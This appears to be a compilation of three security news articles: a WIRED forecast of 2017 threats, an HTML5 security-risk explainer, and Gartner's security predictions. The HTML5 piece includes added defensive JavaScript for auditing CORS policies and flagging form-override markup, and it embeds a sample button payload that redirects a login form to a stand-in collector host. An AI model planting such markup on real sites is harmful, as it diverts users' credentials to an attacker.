WHETHER IT WAS a billion compromised Yahoo accounts or state-sponsored Russian hackers muscling in on the US election, this past year saw hacks of unprecedented scale and temerity. And if history is any guide, next year should yield more of the same.

It’s hard to know for certain what lies ahead, but some themes began to present themselves toward the end of 2016 that will almost certainly continue well into next year. And the more we can anticipate them, the better we can prepare. Here’s what we think 2017 will hold.

Consumer Drones Get Weaponized

Given how frequently the US has used massive flying robots to kill people, perhaps it’s no surprise that smaller drones are now turning deadly, too—this time in the hands of America’s enemies. In October the New York Times reported that in the first known case, US-allied Kurdish soldiers were killed by a small drone the size of a model airplane, rigged with explosives. As drones become smaller, cheaper, and more powerful, the next year will see that experiment widened into a full-blown tactic for guerrilla warfare and terrorism. What better way to deliver deadly ordnance across enemy lines or into secure zones of cities than with remote-controlled accuracy and off-the-shelf hardware that offers no easy way to trace the perpetrator? The US government is already buying drone-jamming hardware. But as with all IEDs, the arms race between flying consumer-grade bombs and the defenses against them will likely be a violent game of cat-and-mouse.

Another iPhone Encryption Clash

When the FBI earlier this year demanded that Apple write new software to help crack its own device—the iPhone 5c of dead San Bernardino terrorist Rizwan Farook—it fired the first shots in a new chapter of the decades-long war between law enforcement and encryption. And when it backed off that request, saying it had found its own technique to crack the phone, it only delayed any resolution. It’s only a matter of time until the FBI or other cops make another legal demand that an encryption-maker assist in cracking its protections for users, setting the conflict in motion again. In fact, in October the FBI revealed that another ISIS-linked terrorist, the man who stabbed ten people in a Minnesota mall, used an iPhone. Depending on what model iPhone it is, that locked device could spark Apple vs. FBI, round two, if the bureau is determined enough to access the terrorist’s data. (It took three months after the San Bernardino attack for the FBI’s conflict with Apple to become public, and that window hasn’t passed in the Minnesota case.) Sooner or later, expect another crypto clash.

Russian Hackers Run Amok

Two months have passed since the Office of the Director of National Intelligence and the Department of Homeland Security stated what most of the private sector cybersecurity world already believed: That the Kremlin hacked the American election, breaching the Democratic National Committee and Democratic Congressional Campaign Committee and spilling their guts to WikiLeaks. Since then, the White House has promised a response to put Russia back in check, but none has surfaced. And with less than a month until the inauguration of Putin’s preferred candidate—one who has buddied up to the Russian government at every opportunity and promised to weaken America’s NATO commitments—any deterrent effect of a retaliation would be temporary at best. In fact, the apparent success of Russia’s efforts—if, as CIA and FBI officials have now both told the Washington Post, Trump’s election was the hackers’ goal—will only embolden Russia’s digital intruders to try new targets and techniques. Expect them to replicate their influence operations ahead of elections next year in Germany, the Netherlands, and France, and potentially to even try new tricks like data sabotage or attacks on physical infrastructure.

A Growing Rift Between the President and the Intelligence Community

Though the US intelligence community—including the FBI, NSA, and CIA—has unanimously attributed multiple incidents of political hacking to Russian government-sponsored attackers, President-elect Donald Trump has remained skeptical. Furthermore, he has repeatedly cast doubt on digital forensics as an intelligence discipline, saying things like, “Once they hack, if you don’t catch them in the act you’re not going to catch them. They have no idea if it’s Russia or China or somebody.” Trump has also caused a stir by declining daily intelligence briefings. Beyond just the current situation with Russia, Trump’s casual dismissal of intelligence agency findings is creating an unprecedented dissonance between the Office of the President and the groups that bring it vital information about the world. Current and former members of the intelligence community told WIRED in mid-December that they find Trump’s attitude disturbing and deeply concerning. If the President-elect permanently adopts this posture, it could irrevocably hinder the role of intelligence agencies in government. President Obama, for one, says he is hopeful that the situation is temporary, since Trump has not yet felt the full responsibility of the presidency. “I think there is a sobering process when you walk into the Oval Office,” Obama said recently in a press conference. “There is just a whole different attitude and vibe when you’re not in power as when you are in power.” If Trump does eventually embrace the intelligence community more fully, the next question will be whether it can move on from what has already transpired.

DDoS Attacks Will Crash the Internet Again (And Again, And Again)

This was the year of Internet of Things botnets, in which malware infects inconspicuous devices like routers and DVRs and then coordinates them to overwhelm an online target with a glut of internet traffic, in what’s known as a distributed denial of service attack (DDoS). Botnets have traditionally been built with compromised PCs, but poor IoT security has made embedded devices an appealing next frontier for hackers, who have been building massive IoT botnets. The most well-known example in 2016, called Mirai, was used this fall to attack and temporarily bring down individual websites, but was also turned on Internet Service Providers and internet-backbone companies, causing connectivity interruptions around the world. DDoS attacks are used by script kiddies and nation states alike, and as long as the pool of unsecured computing devices endlessly grows, a diverse array of attackers will have no disincentive from turning their DDoS cannons on internet infrastructure. And it’s not just internet connectivity itself. Hackers already used a DDoS attack to knock out central heating in some buildings in Finland in November. The versatility of DDoS attacks is precisely what makes them so dangerous. In 2017, they’ll be more prevalent than ever.

Ransomware Expands Its Targets

Ransomware attacks have become a billion-dollar business for cybercriminals and are on the rise for individuals and institutions alike. Attackers already use ransomware to extort money from hospitals and corporations that need to regain control of their systems quickly, and the more success attackers have, the more they are willing to invest in development of new techniques. A recent ransomware version called Popcorn Time, for example, was experimenting with offering victims an alternative to paying up—if they could successfully infect two other devices with the ransomware. And more innovation, plus more disruption, will come in 2017. Ransomware attacks on financial firms have already been rising, and attackers may be emboldened to take on large banks and central financial institutions. And IoT ransomware could crop up in 2017, too. It may not make sense for a surveillance camera, which might not even have an interface for users to pay the ransom, but could be effective for devices that sync with smartphones or tie in to a corporate network. Attackers could also demand money in exchange for ceasing an IoT botnet-driven DDoS attack. In other words, ransomware attacks are going to get bigger in every possible sense of the word.

Author: WIRED STAFF
Source: https://www.wired.com/2017/01/biggest-security-threats-coming-2017


Over the past few years, there have been a lot of changes affecting the key technologies that power the internet.

HTML is the dominant web language, and its new version, HTML5, provides impressive web enhancements for new web applications.

However, when this fifth version of HTML was released back in 2014 and became really popular with web and app developers, the issues surrounding its internet security risks also took hold.

Just like every new technology, HTML5 is bound to have defects and pitfalls. Internet security experts and commenters had also predicted this, long before its release.

HTML5 AND ITS IMPORTANCE

HTML5 is the 5th revision of the HTML standard developed by W3C. While it was approved as a standard in October 2014, its adoption began several years earlier.

This language mainly describes the contents and appearance of web pages. Due to its many new features, it makes web pages more interactive and dynamic.

These features include messaging enhancements, new parsing rules to enhance flexibility, elimination of redundant attributes and native multimedia support.

W3C developed HTML5 mainly to address the compatibility issues with the previous HTML version.

The main reasons why this version has become so popular are the essential elimination of browser plugins, reduction of web development time and mobile friendliness.

HTML5 is also supported by all the major browser vendors including Google, Apple, Opera, Microsoft, and Firefox.

THE INTERNET SECURITY RISKS ASSOCIATED WITH HTML5

As HTML5, approved as a standard in 2014, becomes more popular among developers, it introduces new internet security threats due to its new features and attributes.

HTML5 is being adopted on a very large scale across a large percentage of browsers, and mobile applications are now based on this language.

It is also important for developers and users to know about the internet security risks involved in order to be able to tackle them.

The security problems that affected the older version are still present.

More importantly, the new features in HTML5 present further internet security issues.

Below are some of the attacks made possible by HTML5.

1. CROSS ORIGIN RESOURCE SHARING (CORS ATTACK)

Cross-Origin Resource Sharing (CORS) is a feature that allows a resource to gain access to data from domains outside itself.

Using this feature, web pages can load resources including scripts, CSS style sheets, and images from different domains.

As such, a remote attacker can inject code into the web pages.

An API called XMLHttpRequest makes this possible. Basically, this is an API that facilitates the transfer of data between a server and a client.

Before the introduction of HTML5, a site could not make direct requests to another site using this API.

Now, HTTP requests can be made, provided the requested site grants permission.

This is the point where a vulnerability can arise. Access is granted through the following header in the responses: Access-Control-Allow-Origin.

If a website defines this header incorrectly, or bases it on a wrong assumption, access control can easily be bypassed.

A similar threat called Cross-Site Request Forgery (CSRF) was present in HTML4. However, with HTML5 this is possible without user interaction.
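The header logic described above, as an added example that is not from the original article: two weak ways a server might decide what to put in Access-Control-Allow-Origin, next to an exact allowlist, with a helper that shows which origins each policy ends up granting. All origins and function names are constructed for illustration.

```javascript
// Added example. Origins and function names are constructed for illustration.

// Weak policy 1: echoes any Origin back, so every site is granted access.
function reflectAnyOrigin(origin) {
  return origin ? allow(origin) : {};
}

// Weak policy 2: the "wrong assumption" case. A suffix test is meant to
// cover subdomains of shop.example but also matches look-alike hosts
// and the plain-HTTP variant of the site.
function suffixMatch(origin) {
  return origin && origin.endsWith('shop.example') ? allow(origin) : {};
}

// Hardened policy: exact string comparison against a fixed allowlist.
const ALLOWED_ORIGINS = new Set([
  'https://shop.example',
  'https://account.shop.example',
]);
function exactAllowlist(origin) {
  return ALLOWED_ORIGINS.has(origin) ? allow(origin) : {};
}

// Response headers that grant a cross-origin page access to the response.
function allow(origin) {
  return {
    'Access-Control-Allow-Origin': origin,
    'Access-Control-Allow-Credentials': 'true',
    'Vary': 'Origin', // keep caches from serving one origin's grant to another
  };
}

// Audit helper: which probe origins does a policy grant access to?
function grantedOrigins(policy, probes) {
  return probes.filter(
    (o) => policy(o)['Access-Control-Allow-Origin'] === o
  );
}

// Constructed probe list: two legitimate origins and four that are not.
const PROBES = [
  'https://shop.example',
  'https://account.shop.example',
  'https://evilshop.example',
  'http://shop.example',
  'https://shop.example.attacker.example',
  'null',
];

for (const policy of [reflectAnyOrigin, suffixMatch, exactAllowlist]) {
  console.log(policy.name, grantedOrigins(policy, PROBES));
}
```

Running the same probe list against a real endpoint's responses is a quick regression check after any change to its CORS configuration.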

 

2. HTML5 TAG ABUSE

The new attributes and tags introduced by HTML5 create new openings for cross-site scripting (XSS) attacks. XSS attacks, in which attackers run malicious scripts through unencoded or unvalidated user input, have been around for a while.

Developers often avoid them by filtering user input, that is, by not allowing users to submit certain character sequences.

Some of the new attributes and tags in HTML5 can be employed to run scripts by bypassing input filters. With HTML5, any object can associate itself with any form regardless of its position on the web page.

This can be exploited for malicious purposes. Attackers can also modify web page forms using attributes in HTML5 such as formaction, formenctype, formmethod, formtarget and formnovalidate.
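To show why a filter written for older markup misses these attributes, here is an added example (not from the original article) that runs a blocklist-style filter and an allowlist-based review over the same constructed comment. The sample markup, the allowlist and all function names are assumptions; the regex tokenizer is a review heuristic, and real sanitization should work on a parsed DOM.

```javascript
// Added example. Sample markup and all names are constructed for illustration.

// HTML5 attributes that re-target a form from a control, as listed above,
// plus `form`, which ties a control to a form elsewhere on the page.
const FORM_OVERRIDES = new Set([
  'form', 'formaction', 'formenctype', 'formmethod',
  'formtarget', 'formnovalidate',
]);

// Tags and attributes a hypothetical comment field is allowed to contain.
const ALLOWED = new Map([['p', []], ['b', []], ['i', []], ['a', ['href']]]);

// Filter written with HTML4 in mind: only <script> and on*= handlers.
function legacyFilterAccepts(html) {
  return !/<\s*script\b/i.test(html) && !/\son\w+\s*=/i.test(html);
}

// Review heuristic: list every opening tag and attribute outside the
// allowlist, marking form overrides separately.
function reviewMarkup(html) {
  const findings = [];
  const tagRe = /<([a-zA-Z][\w-]*)((?:"[^"]*"|'[^']*'|[^'">])*)>/g;
  const attrRe = /([^\s"'<>\/=]+)(?:\s*=\s*(?:"[^"]*"|'[^']*'|[^\s"'>]+))?/g;
  for (const [, rawTag, rawAttrs] of html.matchAll(tagRe)) {
    const tag = rawTag.toLowerCase();
    const allowedAttrs = ALLOWED.get(tag);
    if (!allowedAttrs) findings.push({ tag, attr: null, reason: 'tag' });
    for (const [, rawAttr] of rawAttrs.matchAll(attrRe)) {
      const attr = rawAttr.toLowerCase();
      if (FORM_OVERRIDES.has(attr)) {
        findings.push({ tag, attr, reason: 'form-override' });
      } else if (!allowedAttrs || !allowedAttrs.includes(attr)) {
        findings.push({ tag, attr, reason: 'attribute' });
      }
    }
  }
  return findings;
}

// Constructed inputs: an ordinary comment, and one carrying a button that
// attaches itself to a form with id "login" and overrides its target.
const BENIGN =
  '<p>Nice <b>post</b>, see <a href="https://docs.example/guide">this</a></p>';
const SAMPLE =
  '<p>Thanks!</p><button form="login" ' +
  'formaction="https://collector.example/submit" formmethod="get">' +
  'Continue</button>';

console.log('legacy filter accepts sample:', legacyFilterAccepts(SAMPLE));
console.log(reviewMarkup(SAMPLE));
```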

3. LOCAL STORAGE

Prior to HTML5, browser data was stored through web cookies. The local storage feature in HTML5 was developed to improve internet security and enable storage of more web data.

It allows browsers to store and delete data based on name-value pairs. The good news is that it is origin-specific, meaning sites from different origins cannot access applications on local databases.

 

Unfortunately, it is vulnerable to the aforementioned XSS attacks.

XSS flaws resulting from developer errors can allow the execution of JavaScript code, giving attackers access to local variables.

Attackers can also redirect target site requests to different sites using DNS cache poisoning.

There are other internet security issues with HTML5 including Cross Document Messaging, Offline Web Applications, and the middleware framework.

Most of these internet security problems fall into the hands of the web developers.

As such, they can be mitigated by safe coding practices, regular code testing, education on the possible internet security threats, data sanitization and access restriction for untrusted code.

Source:  darkwebnews.com


Watch out for weak in-house code, data in the cloud and the Internet of things 

Forward-looking IT security pros need to better address known risks, monitor closely the value of shadow IT devices and solve the inherent weaknesses introduced by the internet of things, Gartner says.

The consulting firm has taken a look at five key areas of security concern that businesses face this year and issued predictions on and recommendations about protecting networks and data from threats that will likely arise in each.

The areas are threat and vulnerability management, application and data security, network and mobile security, identity and access management, and Internet of Things security. Gartner’s findings were revealed at its recent Security and Risk Management Summit by analyst Earl Perkins.

One overriding recommendation is that businesses must be aware that delaying security measures in an effort to avoid disrupting business can be a false economy.

He recommends that security pros should make decisions about protecting networks and resources based on the range of risks that known weaknesses represent to the business and its goals. Rather than thinking about their role purely as protecting, they should look at it as facilitating successful business outcomes. 

Here are the predictions and recommendations:

Threat and vulnerability management

Prediction: “Through 2020, 99% of vulnerabilities exploited will continue to be ones known by security and IT professionals for at least one year.”

With attackers looking for vulnerabilities in applications as well as exploitable configurations, it’s important for businesses to patch vulnerabilities in a timely fashion. If they don’t, they stand to lose money through damage to systems and theft of data.

Prediction: “By 2020, a third of successful attacks experienced by enterprises will be on their shadow IT resources.”

An area of growing concern is the introduction of new technologies by business units without vetting by the security team, Perkins says. Avoiding that review and the fact that many of these technologies are new and still contain vulnerabilities make them susceptible to attacks.

Application and data security

Prediction: “By 2018, the need to prevent data breaches from public clouds will drive 20% of organizations to develop data security governance programs.”

Data security governance will be promoted by insurance companies that will set cyber premiums based on whether businesses have these programs in place. 

Prediction: “By 2020, 40% of enterprises engaged in DevOps will secure developed applications by adopting application security self-testing, self-diagnosing and self-protection technologies.”

Here Perkins looks to maturing technology called runtime application self-protection (RASP) as a way to avoid vulnerabilities in applications that might result from problems overlooked due to the rapid pace at which DevOps teams work. RASP does its work rapidly and accurately to provide protection against vulnerabilities that might be exploited, he says.

Network and Mobile Security

Prediction: “By 2020, 80% of new deals for cloud-based cloud-access security brokers (CASB) will be packaged with network firewall, secure web gateway (SWG) and web application firewall (WAF) platforms.”

Vendors of traditional network security products such as firewalls, SWGs and WAFs want to be in on their customers protecting their SaaS applications, which is effectively accomplished via CASBs, he says. Businesses should evaluate whether CASB services are warranted based on their plans for application deployment, and should consider offers by their current vendors of these traditional technologies, he says.

Identity and Access Management

Prediction: “By 2019, 40% of identity as a service (IDaaS) implementations will replace on-premises IAM implementations, up from 10% today.”

This increase in use of IDaaS will in part stem from the difficulty and expense of running on-premises IAM infrastructure, and the growing use of other something-as-a-service offerings will make the decision more comfortable. The ongoing introduction of more and more Web and mobile applications will create a natural opportunity for the transition from in-house IAM to IDaaS, he says. 

Prediction: “By 2019, use of passwords and tokens in medium-risk use cases will drop 55%, due to the introduction of recognition technologies.”

Given the cost and accuracy of biometrics, they become a good option for continuous authentication. In combination with user and entity behavior analysis, this technology can make a difference when applied to cases that call for a medium level of trust, Perkins says.

Security for the internet of things (IoT)

Prediction: “Through 2018, over 50% of IoT device manufacturers will not be able to address threats from weak authentication practices.”

IoT devices are still being made without much consideration being given to security, and yet some are located in networks so that, if exploited, they could expose networks to harm and data to breaches, Perkins says. Businesses need a framework for determining the risks each IoT device type represents and the appropriate controls for dealing with them.

Prediction: “By 2020, more than 25% of identified enterprise attacks will involve IoT, though IoT will account for only 10% of IT security budgets.”

Since security pros won’t be able to determine the importance that IoT devices represent to the organization, the business unit that uses them should determine what risk they represent. Security pros should set aside 5% to 10% of IT security spending for monitoring and protecting these devices as needed, he says.

Source: http://www.networkworld.com/article/3088084/security/gartner-s-top-10-security-predictions.html
